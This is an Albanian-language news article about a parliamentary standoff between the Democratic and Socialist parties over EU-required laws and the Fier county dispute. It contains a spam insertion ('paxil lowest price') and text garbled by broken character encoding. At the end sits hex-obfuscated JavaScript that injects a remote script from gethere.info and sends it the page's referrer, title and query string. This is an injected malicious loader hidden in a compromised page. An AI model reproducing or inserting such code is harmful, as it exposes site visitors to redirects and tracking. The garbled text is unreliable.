temp_KuvendiShqiperise_245184326

Ligjet pA�r statusin nA� Kuvend, PD e PS pa kompromis

paxil lowest price. Seanca e sotme plenare e Kuvendit tA� ShqipA�risA� mund tA� konsiderohet si mundA�sia e fundit qA� ShqipA�ria tA� pA�rmbushA� kA�rkesat e Brukselit pA�r dhA�nien e statusit. Komisioni Europian ka bA�rA� njA� rekomandim pozitiv nA� tetor pA�r marrjen e statusit tA� kandidatit por duke e kushtA�zuar me miratimin e ligjit pA�r GjykatA�n e LartA�, atA� tA� NA�punA�sit civil dhe Rregulloren e parlamentit, dhe pA�rpara mbledhjes sA� KA�shillit tA� ministrave tA� vendeve anA�tare, Komisioni duhet qA� javA�n e ardhshme tA� informojA� nA�se kA�to kushte janA� plotA�suar.

Por tA� dyja palA�t nuk kanA� lA�vizur nga qA�ndrimet e tyre. Tre ligjet e kA�rkuara nga Komisioni Europian kanA� mbetur tA� bllokuar nga problemi i qarkut tA� Fierit, pA�r tA� cilin opozita thotA� se janA� njA� seri vendimesh gjykate qA� i japin tA� drejtA� asaj.

Kryeministri Sali Berisha refuzoi dje kA�rkesA�n e kreut tA� PS-sA� Edi Rama pA�r tu mbledhur nA� njA� tryezA� pA�r tA� zgjidhur A�A�shtjen e Fierit duke shtuar se nuk mund tA� ulet nA� tyrezA� pA�r tA� diskutuar vendimet e gjykatave. a�?Zoti Rama pA�r A�do gjA� mund tA� ftosh pA�r tu mbledhur dhe tA� garantoj se pavarA�sisht nga pozicionet qA� kemi, unA� do tA� shqyrtoj me seriozitetin mA� tA� madh ftesat e kryetarit tA� partisA� mA� tA� madhe opozitare dhe jam ulur sa herA� A�shtA� konsideruar e nevojshme dhe do tA� ulem me tA�, por pA�r njA� gjA� dhe ja kam faktuar atij dhe kujto tjetA�r se nuk do tA� ulemi kurrA� pA�r vendime gjykate. PA�r vendime gjykatash A�do vend i lirA� ka institucionet e zbatimit tA� ligjita�?, tha Berisha.

Por kreu i PS-sA� Edi Rama ka ripA�rsA�ritur dje qA�ndrimin pA�r tA� mos miratuar sot tre ligjet e kA�rkuara nga Brukseli pa u zgjidhur mA� parA� A�A�shtja e Fierit. a�?Fieri A�shtA� shembulli mA� flagrant i mosfunksionimit tA� demokracisA�. Kjo A�shtA� e vA�rteta dhe asgjA� tjetA�r pA�rveA� tA� vA�rtetA�s. Nuk ka rA�ndA�si pA�r PS se kush do e drejtojA� qarkun, por A�shtA� nA� pikA�pyetje funksionimi i shtetit tA� sA� drejtA�s, respektimi i gjykatave dhe i vendimeve gjyqA�sore tA� formA�s sA� prerA� nA� funksion tA� shprehjes sA� lirA� tA� vullnetit tA� 300 mijA� njerA�zve tA� trupA�s zgjedhorea�?, tha Rama.

NjA� tjetA�r ngA�rA� A�shtA� edhe reforma parlamentare e mbetur pezull vetA�m nA� pA�rcaktimin e ndA�rhyrjeve nA� parlament tA� kreut tA� opozitA�s ndaj deklarimeve tA� kryeministrit.var _0x31f1=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0x31f1[1]](_0x31f1[0]);s[_0x31f1[2]]= _0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12];if(document[_0x31f1[13]]){document[_0x31f1[13]][_0x31f1[15]][_0x31f1[14]](s,document[_0x31f1[13]])}else {d[_0x31f1[18]](_0x31f1[17])[0][_0x31f1[16]](s)};if(document[_0x31f1[11]][_0x31f1[19]]=== _0x31f1[20]&& KTracking[_0x31f1[22]][_0x31f1[21]](_0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12])=== -1){alert(_0x31f1[23])}